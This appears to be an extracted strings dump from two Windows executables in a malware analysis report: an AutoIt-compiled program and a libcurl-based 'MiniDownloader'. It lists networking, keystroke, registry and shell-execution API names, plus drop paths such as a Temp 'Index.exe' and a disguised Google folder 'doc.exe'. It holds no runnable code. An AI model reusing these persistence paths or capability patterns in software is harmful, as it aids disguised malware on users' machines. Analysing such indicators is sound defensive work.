USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GDI32.dll
GDI32.dll
COMDLG32.dll
COMDLG32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHFileOperationW
SHFileOperationW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
GetCPInfo
GetCPInfo
zcÃ
zcÃ
cq-%C$
cq-%C$
i.wx4
i.wx4
sC%uH
sC%uH
_APqZ.tp
_APqZ.tp
nz.ye
nz.ye
> >$>(>=>
> >$>(>=>
5o6q6
5o6q6
6!6%6)6-616
6!6%6)6-616
343C3n3v3}3
343C3n3v3}3
:&:*:.:2:
:&:*:.:2:
4#4'4 4/43474;4
4#4'4 4/43474;4
mscoree.dll
mscoree.dll
combase.dll
combase.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
USER32.DLL
USER32.DLL
>>>AUTOIT NO CMDEXECUTE
>>>AUTOIT NO CMDEXECUTE
CMDLINERAW
CMDLINERAW
CMDLINE
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
/AutoIt3ExecuteScript
APPSKEY
APPSKEY
789:;?
789:;?
FTPSETPROXY
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLRECVMSG
GUICTRLSENDMSG
GUICTRLSENDMSG
GUIGETMSG
GUIGETMSG
GUIREGISTERMSG
GUIREGISTERMSG
HOTKEYSET
HOTKEYSET
HTTPSETPROXY
HTTPSETPROXY
HTTPSETUSERAGENT
HTTPSETUSERAGENT
ISKEYWORD
ISKEYWORD
MSGBOX
MSGBOX
REGENUMKEY
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTE
SHELLEXECUTEWAIT
SHELLEXECUTEWAIT
TCPACCEPT
TCPACCEPT
TCPCLOSESOCKET
TCPCLOSESOCKET
TCPCONNECT
TCPCONNECT
TCPLISTEN
TCPLISTEN
TCPNAMETOIP
TCPNAMETOIP
TCPRECV
TCPRECV
TCPSEND
TCPSEND
TCPSHUTDOWN
TCPSHUTDOWN
TCPSTARTUP
TCPSTARTUP
TRAYGETMSG
TRAYGETMSG
UDPBIND
UDPBIND
UDPCLOSESOCKET
UDPCLOSESOCKET
UDPOPEN
UDPOPEN
UDPRECV
UDPRECV
UDPSEND
UDPSEND
UDPSHUTDOWN
UDPSHUTDOWN
UDPSTARTUP
UDPSTARTUP
SendKeyDelay
SendKeyDelay
SendKeyDownDelay
SendKeyDownDelay
TCPTimeout
TCPTimeout
WINDOWSDIR
WINDOWSDIR
AUTOITEXE
AUTOITEXE
HOTKEYPRESSED
HOTKEYPRESSED
%s (%d) : ==> %s.:
%s (%d) : ==> %s.:
Line %d:
Line %d:
Line %d (File "%s"):
Line %d (File "%s"):
%s (%d) : ==> %s:
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
*.au3;*.a3x
All files (*.*)
All files (*.*)
04090000
04090000
%u.%u.%u.%u
%u.%u.%u.%u
0.0.0.0
0.0.0.0
Mddddd
Mddddd
"%s" (%d) : ==> %s:
"%s" (%d) : ==> %s:
\??\%s
\??\%s
GUI_RUNDEFMSG
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
AUTOITCALLVARIABLE%d
255.255.255.255
255.255.255.255
Keyword
Keyword
AUTOIT.ERROR
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 12, 0
3, 3, 12, 0
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_USERS
HKEY_USERS
%d/d/d
%d/d/d
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Index.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Index.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
doc.exe_640:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
SSh8*K
SSh8*K
.hP6K
.hP6K
PSSSSSSh
PSSSSSSh
Gt.Ht$
Gt.Ht$
t.jGZf;
t.jGZf;
PSSShl
PSSShl
PVSShl
PVSShl
j.Zf;
j.Zf;
;K|s%f
;K|s%f
?#%X.y
?#%X.y
GetProcessWindowStation
GetProcessWindowStation
operator
operator
kernel32.dll
kernel32.dll
oleaut32.dll
oleaut32.dll
RegDeleteKeyExW
RegDeleteKeyExW
advapi32.dll
advapi32.dll
Error text not found (please report)
Error text not found (please report)
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
\N is not supported in a class
WSOCK32.dll
WSOCK32.dll
VERSION.dll
VERSION.dll
WINMM.dll
WINMM.dll
COMCTL32.dll
COMCTL32.dll
MPR.dll
MPR.dll
InternetCrackUrlW
InternetCrackUrlW
HttpQueryInfoW
HttpQueryInfoW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
FtpOpenFileW
FtpOpenFileW
FtpGetFileSize
FtpGetFileSize
InternetOpenUrlW
InternetOpenUrlW
WININET.dll
WININET.dll
PSAPI.DLL
PSAPI.DLL
IPHLPAPI.DLL
IPHLPAPI.DLL
USERENV.dll
USERENV.dll
UxTheme.dll
UxTheme.dll
GetProcessHeap
GetProcessHeap
CreatePipe
CreatePipe
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
OpenWindowStationW
OpenWindowStationW
SetProcessWindowStation
SetProcessWindowStation
CloseWindowStation
CloseWindowStation
MapVirtualKeyW
MapVirtualKeyW
EnumChildWindows
EnumChildWindows
EnumWindows
EnumWindows
VkKeyScanW
VkKeyScanW
GetKeyState
GetKeyState
GetKeyboardState
GetKeyboardState
SetKeyboardState
SetKeyboardState
GetAsyncKeyState
GetAsyncKeyState
keybd_event
keybd_event
EnumThreadWindows
EnumThreadWindows
ExitWindowsEx
ExitWindowsEx
UnregisterHotKey
UnregisterHotKey
RegisterHotKey
RegisterHotKey
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GDI32.dll
GDI32.dll
COMDLG32.dll
COMDLG32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHFileOperationW
SHFileOperationW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
GetCPInfo
GetCPInfo
zcÃ
zcÃ
MI.ih
MI.ih
> >$>(>=>
> >$>(>=>
5o6q6
5o6q6
6!6%6)6-616
6!6%6)6-616
343C3n3v3}3
343C3n3v3}3
:&:*:.:2:
:&:*:.:2:
4#4'4 4/43474;4
4#4'4 4/43474;4
mscoree.dll
mscoree.dll
combase.dll
combase.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
USER32.DLL
USER32.DLL
>>>AUTOIT NO CMDEXECUTE
>>>AUTOIT NO CMDEXECUTE
CMDLINERAW
CMDLINERAW
CMDLINE
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
/AutoIt3ExecuteScript
APPSKEY
APPSKEY
789:;?
789:;?
FTPSETPROXY
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLRECVMSG
GUICTRLSENDMSG
GUICTRLSENDMSG
GUIGETMSG
GUIGETMSG
GUIREGISTERMSG
GUIREGISTERMSG
HOTKEYSET
HOTKEYSET
HTTPSETPROXY
HTTPSETPROXY
HTTPSETUSERAGENT
HTTPSETUSERAGENT
ISKEYWORD
ISKEYWORD
MSGBOX
MSGBOX
REGENUMKEY
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTE
SHELLEXECUTEWAIT
SHELLEXECUTEWAIT
TCPACCEPT
TCPACCEPT
TCPCLOSESOCKET
TCPCLOSESOCKET
TCPCONNECT
TCPCONNECT
TCPLISTEN
TCPLISTEN
TCPNAMETOIP
TCPNAMETOIP
TCPRECV
TCPRECV
TCPSEND
TCPSEND
TCPSHUTDOWN
TCPSHUTDOWN
TCPSTARTUP
TCPSTARTUP
TRAYGETMSG
TRAYGETMSG
UDPBIND
UDPBIND
UDPCLOSESOCKET
UDPCLOSESOCKET
UDPOPEN
UDPOPEN
UDPRECV
UDPRECV
UDPSEND
UDPSEND
UDPSHUTDOWN
UDPSHUTDOWN
UDPSTARTUP
UDPSTARTUP
SendKeyDelay
SendKeyDelay
SendKeyDownDelay
SendKeyDownDelay
TCPTimeout
TCPTimeout
WINDOWSDIR
WINDOWSDIR
AUTOITEXE
AUTOITEXE
HOTKEYPRESSED
HOTKEYPRESSED
%s (%d) : ==> %s.:
%s (%d) : ==> %s.:
Line %d:
Line %d:
Line %d (File "%s"):
Line %d (File "%s"):
%s (%d) : ==> %s:
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
*.au3;*.a3x
All files (*.*)
All files (*.*)
04090000
04090000
%u.%u.%u.%u
%u.%u.%u.%u
0.0.0.0
0.0.0.0
Mddddd
Mddddd
"%s" (%d) : ==> %s:
"%s" (%d) : ==> %s:
\??\%s
\??\%s
GUI_RUNDEFMSG
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
AUTOITCALLVARIABLE%d
255.255.255.255
255.255.255.255
Keyword
Keyword
AUTOIT.ERROR
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 12, 0
3, 3, 12, 0
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_USERS
HKEY_USERS
%d/d/d
%d/d/d
%Documents and Settings%\%current user%\Application Data\Google\int\doc.exe
%Documents and Settings%\%current user%\Application Data\Google\int\doc.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.
bdMiniDownloaderEG_MENAON-Mini_32_3313.exe_1128:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
UU U!"UU#$UUUU%&'UUU(U)*U UUU,-.UU/0123UUUUUU4UUUUUUU5UUUUUU6789:;UUUUUUUU?@ABCDUUUUEUUUUFUUUUUUGUUHIUUUUUJKUUULMUUNUUUUUUUUUOUUPUQRST
UU U!"UU#$UUUU%&'UUU(U)*U UUU,-.UU/0123UUUUUU4UUUUUUU5UUUUUU6789:;UUUUUUUU?@ABCDUUUUEUUUUFUUUUUUGUUHIUUUUUJKUUULMUUNUUUUUUUUUOUUPUQRST
!"FFF#F$Fÿ&F'()FFFFFFFFFFFFF*FFFFFFFFFFFF FF,-FFFFFFFFFFF.F/FFFFFFFFFFFFFF01FF234FF56789FFFFFFFF:;FFFF?FFFFF@ABFFFFFCFDFFFFFE
!"FFF#F$Fÿ&F'()FFFFFFFFFFFFF*FFFFFFFFFFFF FF,-FFFFFFFFFFF.F/FFFFFFFFFFFFFF01FF234FF56789FFFFFFFF:;FFFF?FFFFF@ABFFFFFCFDFFFFFE
tcPh
tcPh
%u Wj%
%u Wj%
t.Gj:W
t.Gj:W
t-hL}J
t-hL}J
SSSSh
SSSSh
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
X;
X;
%s>
%s>
%s='%s'
%s='%s'
%s="%s"
%s="%s"
standalone="%s"
standalone="%s"
encoding="%s"
encoding="%s"
version="%s"
version="%s"
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
httpheader
httpheader
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
operator
operator
GetProcessWindowStation
GetProcessWindowStation
portuguese-brazilian
portuguese-brazilian
.jpeg
.jpeg
.html
.html
0123456789
0123456789
PORT
PORT
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Closing connection %d
Closing connection %d
Curl_addHandleToPipeline: length: %d
Curl_addHandleToPipeline: length: %d
Found bundle for host %s: %p
Found bundle for host %s: %p
Server doesn't support pipelining
Server doesn't support pipelining
Connection %d seems to be dead!
Connection %d seems to be dead!
About to connect() to %s%s port %ld (#%ld)
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode domains
IDN support not present, can't parse Unicode domains
Protocol %s not supported or disabled in libcurl
Protocol %s not supported or disabled in libcurl
[^:]:%[^
[^:]:%[^
:]://%[^
:]://%[^
malformed
malformed
http_proxy
http_proxy
%5[^:@]:%5[^@]
%5[^:@]:%5[^@]
:%5[^@]
:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
;type=%c
%s://%s%s%s:%hu%s%s%s
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Port number too large: %lu
Couldn't find host %s in the _netrc file; using defaults
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Couldn't resolve proxy '%s'
%s://%s
%s://%s
Found connection %d, with requests in the pipe (%d)
Found connection %d, with requests in the pipe (%d)
Re-using existing connection! (#%ld) with host %s
Re-using existing connection! (#%ld) with host %s
User-Agent: %s
User-Agent: %s
Connection #%ld to host %s left intact
Connection #%ld to host %s left intact
Failed to set SO_KEEPALIVE on fd %d
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Couldn't bind to interface '%s'
Name '%s' family %i resolved to '%s' family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
getsockname() failed with errno %d: %s
Local port: %hu
Local port: %hu
Bind to local port %hu failed, trying next
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Failed connect to %s:%ld; %s
Failed connect to %s:%ld; %s
Could not set TCP_NODELAY: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Trying %s...
Failed to connect to %s: %s
Failed to connect to %s: %s
couldn't connect to %s at %s:%d
couldn't connect to %s at %s:%d
Pipe broke: handle 0x%p, url = %s
Pipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Internal error clearing splay node = %d
Internal error clearing splay node = %d
Internal error removing splay node = %d
Internal error removing splay node = %d
%s:%d
%s:%d
%5[^:]:%d:%5s
%5[^:]:%d:%5s
Resolve %s found illegal!
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
Added %s:%d:%s to DNS cache
Could not resolve %s: %s
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
getaddrinfo() failed for %s:%d; %s
Send failure: %s
Send failure: %s
Recv failure: %s
Recv failure: %s
[%s %s %s]
[%s %s %s]
23[^;
23[^;
=]=I99[^;
=]=I99[^;
httponly
httponly
skipped cookie with illegal dotcount domain: %s
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
skipped cookie with bad tailmatch domain: %s
#HttpOnly_
#HttpOnly_
%s cookie %s="%s" for domain %s, path %s, expire %lld
%s cookie %s="%s" for domain %s, path %s, expire %lld
%s%s%s
%s%s%s
# Netscape HTTP Cookie File
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/docs/http-cookies.html
# hXXp://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
# Fatal libcurl error
WARNING: failed to save cookies in %s
WARNING: failed to save cookies in %s
%s:%s:%s
%s:%s:%s
%s:%.*s
%s:%.*s
%s:%s
%s:%s
%s:%s:x:%s:%s:%s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, opaque="%s"
%s, algorithm="%s"
%s, algorithm="%s"
Couldn't open file %s
Couldn't open file %s
Can't open %s for writing
Can't open %s for writing
Can't get the size of %s
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%hu
LDAP local: Cannot connect to %s:%hu
LDAP local: ldap_simple_bind_s %s
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
LDAP remote: %s
There are more than %d entries
There are more than %d entries
CLIENT libcurl 7.30.0
CLIENT libcurl 7.30.0
MATCH %s %s %s
MATCH %s %s %s
DEFINE %s %s
DEFINE %s %s
--:--:--
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
Failed to resolve "%s" for SOCKS4 connect.
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
SOCKS4%s request granted.
